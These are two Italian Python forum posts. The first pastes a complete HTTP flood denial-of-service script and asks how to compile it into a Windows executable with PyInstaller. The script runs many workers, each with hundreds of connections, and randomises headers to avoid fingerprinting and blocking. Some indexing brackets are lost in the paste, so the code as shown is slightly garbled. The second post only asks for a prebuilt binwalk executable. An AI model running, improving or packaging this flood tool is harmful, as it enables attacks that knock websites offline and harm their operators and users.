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- 2022-06-06 07:49:31
- aiuto per compilazione Win32 tramite PyInstaller
- Forum >> Programmazione Python >> Scripting
questo script:
from multiprocessing import Process, Manager, Pool import urllib.parse, ssl import sys, getopt, random, time, os import http.client HTTPCLIENT = http.client #### # Config #### DEBUG = False SSLVERIFY = True #### # Constants #### METHOD_GET = 'get' METHOD_POST = 'post' METHOD_RAND = 'random' JOIN_TIMEOUT = 1.0 DEFAULT_WORKERS = 10 DEFAULT_SOCKETS = 500 MYSCRIPT_BANNER = 'myscript' USER_AGENT_PARTS = { 'os': { 'linux': { 'name': ['Linux x86_64', 'Linux i386'], 'ext': ['X11'] }, 'windows': { 'name': ['Windows NT 6.1', 'Windows NT 6.3', 'Windows NT 5.1', 'Windows NT.6.2'], 'ext': ['WOW64', 'Win64; x64'] }, 'mac': { 'name': ['Macintosh'], 'ext': ['Intel Mac OS X %d_%d_%d' % (random.randint(10, 11), random.randint(0, 9), random.randint(0, 5)) for i in range(1, 10)] }, }, 'platform': { 'webkit': { 'name': ['AppleWebKit/%d.%d' % (random.randint(535, 537), random.randint(1,36)) for i in range(1, 30)], 'details': ['KHTML, like Gecko'], 'extensions': ['Chrome/%d.0.%d.%d Safari/%d.%d' % (random.randint(6, 32), random.randint(100, 2000), random.randint(0, 100), random.randint(535, 537), random.randint(1, 36)) for i in range(1, 30) ] + [ 'Version/%d.%d.%d Safari/%d.%d' % (random.randint(4, 6), random.randint(0, 1), random.randint(0, 9), random.randint(535, 537), random.randint(1, 36)) for i in range(1, 10)] }, 'iexplorer': { 'browser_info': { 'name': ['MSIE 6.0', 'MSIE 6.1', 'MSIE 7.0', 'MSIE 7.0b', 'MSIE 8.0', 'MSIE 9.0', 'MSIE 10.0'], 'ext_pre': ['compatible', 'Windows; U'], 'ext_post': ['Trident/%d.0' % i for i in range(4, 6) ] + [ '.NET CLR %d.%d.%d' % (random.randint(1, 3), random.randint(0, 5), random.randint(1000, 30000)) for i in range(1, 10)] } }, 'gecko': { 'name': ['Gecko/%d%02d%02d Firefox/%d.0' % (random.randint(2001, 2010), random.randint(1,31), random.randint(1,12) , random.randint(10, 25)) for i in range(1, 30)], 'details': [], 'extensions': [] } } } #### # MyScript Class #### class MyScript(object): # Counters counter = [0, 0] last_counter = [0, 0] # Containers workersQueue = [] manager = None useragents = [] # Properties url = None # Options nr_workers = DEFAULT_WORKERS nr_sockets = DEFAULT_SOCKETS method = METHOD_GET def __init__(self, url): # Set URL self.url = url # Initialize Manager self.manager = Manager() # Initialize Counters self.counter = self.manager.list((0, 0)) def exit(self): self.stats() print("Shutting down") def __del__(self): self.exit() def printHeader(self): # Taunt! print() print(MYSCRIPT_BANNER) print() # Do the fun! def fire(self): self.printHeader() print("Hitting webserver in mode '{0}' with {1} workers running {2} connections each. Hit CTRL+C to cancel.".format(self.method, self.nr_workers, self.nr_sockets)) if DEBUG: print("Starting {0} concurrent workers".format(self.nr_workers)) # Start workers for i in range(int(self.nr_workers)): try: worker = Striker(self.url, self.nr_sockets, self.counter) worker.useragents = self.useragents worker.method = self.method self.workersQueue.append(worker) worker.start() except Exception: error("Failed to start worker {0}".format(i)) pass if DEBUG: print("Initiating monitor") self.monitor() def stats(self): try: if self.counter0 > 0 or self.counter1 > 0: print("{0} MyScript strikes hit. ({1} Failed)".format(self.counter0, self.counter1)) if self.counter0 > 0 and self.counter1 > 0 and self.last_counter0 == self.counter0 and self.counter1 > self.last_counter1: print("\tServer may be DOWN!") self.last_counter0 = self.counter0 self.last_counter1 = self.counter1 except Exception: pass # silently ignore def monitor(self): while len(self.workersQueue) > 0: try: for worker in self.workersQueue: if worker is not None and worker.is_alive(): worker.join(JOIN_TIMEOUT) else: self.workersQueue.remove(worker) self.stats() except (KeyboardInterrupt, SystemExit): print("CTRL+C received. Killing all workers") for worker in self.workersQueue: try: if DEBUG: print("Killing worker {0}".format(worker.name)) #worker.terminate() worker.stop() except Exception: pass # silently ignore if DEBUG: raise else: pass #### # Striker Class #### class Striker(Process): # Counters request_count = 0 failed_count = 0 # Containers url = None host = None port = 80 ssl = False referers = [] useragents = [] socks = [] counter = None nr_socks = DEFAULT_SOCKETS # Flags runnable = True # Options method = METHOD_GET def __init__(self, url, nr_sockets, counter): super(Striker, self).__init__() self.counter = counter self.nr_socks = nr_sockets parsedUrl = urllib.parse.urlparse(url) if parsedUrl.scheme == 'https': self.ssl = True self.host = parsedUrl.netloc.split(':')0 self.url = parsedUrl.path self.port = parsedUrl.port if not self.port: self.port = 80 if not self.ssl else 443 self.referers = [ 'http://www.google.com/', 'http://www.bing.com/', 'http://www.baidu.com/', 'http://www.yandex.com/', 'http://' + self.host + '/' ] def __del__(self): self.stop() #builds random ascii string def buildblock(self, size): out_str = '' _LOWERCASE = list(range(97, 122)) _UPPERCASE = list(range(65, 90)) _NUMERIC = list(range(48, 57)) validChars = _LOWERCASE + _UPPERCASE + _NUMERIC for i in range(0, size): a = random.choice(validChars) out_str += chr(a) return out_str def run(self): if DEBUG: print("Starting worker {0}".format(self.name)) while self.runnable: try: for i in range(self.nr_socks): if self.ssl: if SSLVERIFY: c = HTTPCLIENT.HTTPSConnection(self.host, self.port) else: c = HTTPCLIENT.HTTPSConnection(self.host, self.port, context=ssl._create_unverified_context()) else: c = HTTPCLIENT.HTTPConnection(self.host, self.port) self.socks.append(c) for conn_req in self.socks: (url, headers) = self.createPayload() method = random.choice([METHOD_GET, METHOD_POST]) if self.method == METHOD_RAND else self.method conn_req.request(method.upper(), url, None, headers) for conn_resp in self.socks: resp = conn_resp.getresponse() self.incCounter() self.closeConnections() except: self.incFailed() if DEBUG: raise else: pass # silently ignore if DEBUG: print("Worker {0} completed run. Sleeping...".format(self.name)) def closeConnections(self): for conn in self.socks: try: conn.close() except: pass # silently ignore def createPayload(self): req_url, headers = self.generateData() random_keys = list(headers.keys()) random.shuffle(random_keys) random_headers = {} for header_name in random_keys: random_headersheader name = headersheader name return (req_url, random_headers) def generateQueryString(self, ammount = 1): queryString = [] for i in range(ammount): key = self.buildblock(random.randint(3,10)) value = self.buildblock(random.randint(3,20)) element = "{0}={1}".format(key, value) queryString.append(element) return '&'.join(queryString) def generateData(self): returnCode = 0 param_joiner = "?" if len(self.url) == 0: self.url = '/' if self.url.count("?") > 0: param_joiner = "&" request_url = self.generateRequestUrl(param_joiner) http_headers = self.generateRandomHeaders() return (request_url, http_headers) def generateRequestUrl(self, param_joiner = '?'): return self.url + param_joiner + self.generateQueryString(random.randint(1,5)) def getUserAgent(self): if self.useragents: return random.choice(self.useragents) # Mozilla/version ([system and browser information]) platform ([platform details]) extensions ## Mozilla Version mozilla_version = "Mozilla/5.0" # hardcoded for now, almost every browser is on this version except IE6 ## System And Browser Information # Choose random OS os = USER_AGENT_PARTS['os'][random.choice(list(USER_AGENT_PARTS['os'].keys()))] os_name = random.choice(os['name']) sysinfo = os_name # Choose random platform platform = USER_AGENT_PARTS['platform'][random.choice(list(USER_AGENT_PARTS['platform'].keys()))] # Get Browser Information if available if 'browser_info' in platform and platform['browser_info']: browser = platform['browser_info'] browser_string = random.choice(browser['name']) if 'ext_pre' in browser: browser_string = "%s; %s" % (random.choice(browser['ext_pre']), browser_string) sysinfo = "%s; %s" % (browser_string, sysinfo) if 'ext_post' in browser: sysinfo = "%s; %s" % (sysinfo, random.choice(browser['ext_post'])) if 'ext' in os and os['ext']: sysinfo = "%s; %s" % (sysinfo, random.choice(os['ext'])) ua_string = "%s (%s)" % (mozilla_version, sysinfo) if 'name' in platform and platform['name']: ua_string = "%s %s" % (ua_string, random.choice(platform['name'])) if 'details' in platform and platform['details']: ua_string = "%s (%s)" % (ua_string, random.choice(platform['details']) if len(platform['details']) > 1 else platform['details']0 ) if 'extensions' in platform and platform['extensions']: ua_string = "%s %s" % (ua_string, random.choice(platform['extensions'])) return ua_string def generateRandomHeaders(self): # Random no-cache entries noCacheDirectives = ['no-cache', 'max-age=0'] random.shuffle(noCacheDirectives) nrNoCache = random.randint(1, (len(noCacheDirectives)-1)) noCache = ', '.join(noCacheDirectives[:nrNoCache]) # Random accept encoding acceptEncoding = ['\'\'','*','identity','gzip','deflate'] random.shuffle(acceptEncoding) nrEncodings = random.randint(1,int(len(acceptEncoding)/2)) roundEncodings = acceptEncoding[:nrEncodings] http_headers = { 'User-Agent': self.getUserAgent(), 'Cache-Control': noCache, 'Accept-Encoding': ', '.join(roundEncodings), 'Connection': 'keep-alive', 'Keep-Alive': random.randint(1,1000), 'Host': self.host, } # Randomly-added headers # These headers are optional and are # randomly sent thus making the # header count random and unfingerprintable if random.randrange(2) == 0: # Random accept-charset acceptCharset = [ 'ISO-8859-1', 'utf-8', 'Windows-1251', 'ISO-8859-2', 'ISO-8859-15', ] random.shuffle(acceptCharset) http_headers['Accept-Charset'] = '{0},{1};q={2},*;q={3}'.format(acceptCharset0, acceptCharset1,round(random.random(), 1), round(random.random(), 1)) if random.randrange(2) == 0: # Random Referer url_part = self.buildblock(random.randint(5,10)) random_referer = random.choice(self.referers) + url_part if random.randrange(2) == 0: random_referer = random_referer + '?' + self.generateQueryString(random.randint(1, 10)) http_headers['Referer'] = random_referer if random.randrange(2) == 0: # Random Content-Trype http_headers['Content-Type'] = random.choice(['multipart/form-data', 'application/x-url-encoded']) if random.randrange(2) == 0: # Random Cookie http_headers['Cookie'] = self.generateQueryString(random.randint(1, 5)) return http_headers # Housekeeping def stop(self): self.runnable = False self.closeConnections() self.terminate() # Counter Functions def incCounter(self): try: self.counter0 += 1 except Exception: pass def incFailed(self): try: self.counter1 += 1 except Exception: pass #### #### # Other Functions #### def usage(): print() print('-----------------------------------------------------------------------------------------------------------') print() print(MYSCRIPT_BANNER) print() print(' USAGE: ./myscript.py <url> OPTIONS') print() print(' OPTIONS:') print('\t Flag\t\t\tDescription\t\t\t\t\t\tDefault') print('\t -u, --useragents\tFile with user-agents to use\t\t\t\t(default: randomly generated)') print('\t -w, --workers\t\tNumber of concurrent workers\t\t\t\t(default: {0})'.format(DEFAULT_WORKERS)) print('\t -s, --sockets\t\tNumber of concurrent sockets\t\t\t\t(default: {0})'.format(DEFAULT_SOCKETS)) print('\t -m, --method\t\tHTTP Method to use \'get\' or \'post\' or \'random\'\t\t(default: get)') print('\t -n, --nosslcheck\tDo not verify SSL Certificate\t\t\t\t(default: True)') print('\t -d, --debug\t\tEnable Debug Mode [more verbose output]\t\t\t(default: False)') print('\t -h, --help\t\tShows this help') print() print('-----------------------------------------------------------------------------------------------------------') def error(msg): # print help information and exit: sys.stderr.write(str(msg+"\n")) usage() sys.exit(2) #### # Main #### def main(): try: if len(sys.argv) < 2: error('Please supply at least the URL') url = sys.argv1 if url == '-h': usage() sys.exit() if url[0:4].lower() != 'http': error("Invalid URL supplied") if url == None: error("No URL supplied") opts, args = getopt.getopt(sys.argv[2:], "ndhw:s:m:u:", ["nosslcheck", "debug", "help", "workers", "sockets", "method", "useragents" ]) workers = DEFAULT_WORKERS socks = DEFAULT_SOCKETS method = METHOD_GET uas_file = None useragents = [] for o, a in opts: if o in ("-h", "--help"): usage() sys.exit() elif o in ("-u", "--useragents"): uas_file = a elif o in ("-s", "--sockets"): socks = int(a) elif o in ("-w", "--workers"): workers = int(a) elif o in ("-d", "--debug"): global DEBUG DEBUG = True elif o in ("-n", "--nosslcheck"): global SSLVERIFY SSLVERIFY = False elif o in ("-m", "--method"): if a in (METHOD_GET, METHOD_POST, METHOD_RAND): method = a else: error("method {0} is invalid".format(a)) else: error("option '"+o+"' doesn't exists") if uas_file: try: with open(uas_file) as f: useragents = f.readlines() except EnvironmentError: error("cannot read file {0}".format(uas_file)) myscript = MyScript(url) myscript.useragents = useragents myscript.nr_workers = workers myscript.method = method myscript.nr_sockets = socks myscript.fire() except getopt.GetoptError as err: # print help information and exit: sys.stderr.write(str(err)) usage() sys.exit(2) if __name__ == "__main__": main()
funziona perfettamente da Python su linux
ma da Python su Windows 32bit/64bit funziona male, e se lo compilo in Win32 tramite PyInstaller (da Windows 32bit) - poi in esecuzione ottengo il classico errore del multiprocessing con Windows, come posso risolvere?!?
nel dettaglio come posso modifcare questo script applicando il fix "multiprocessing.freeze_support()"?!?
- 2021-02-18 12:27:54
- compilazione Win32 binwalk
- Forum >> Programmazione Python >> Scripting
- ciao a tutti!
attualmente mi trovo in una particolare situazione in cui non posso usare python direttamente su Windows (ma soltanto su Android 9.0 Pie ARMv8 [Motorola E6 Plus XT2025-2] senza root tramite "QPython 3L"), e necessito di una compilazione .exe Win32 (al limite pure Win64 va bene) di binwalk
qualcuno può aiutarmi passandomi binwalk già compilato .exe Win32?!? (anche Win64 va bene)
(sono consapevole che binwalk lavora peggio in ambiente Windows rispetto a linux)
grazie per la pazienza!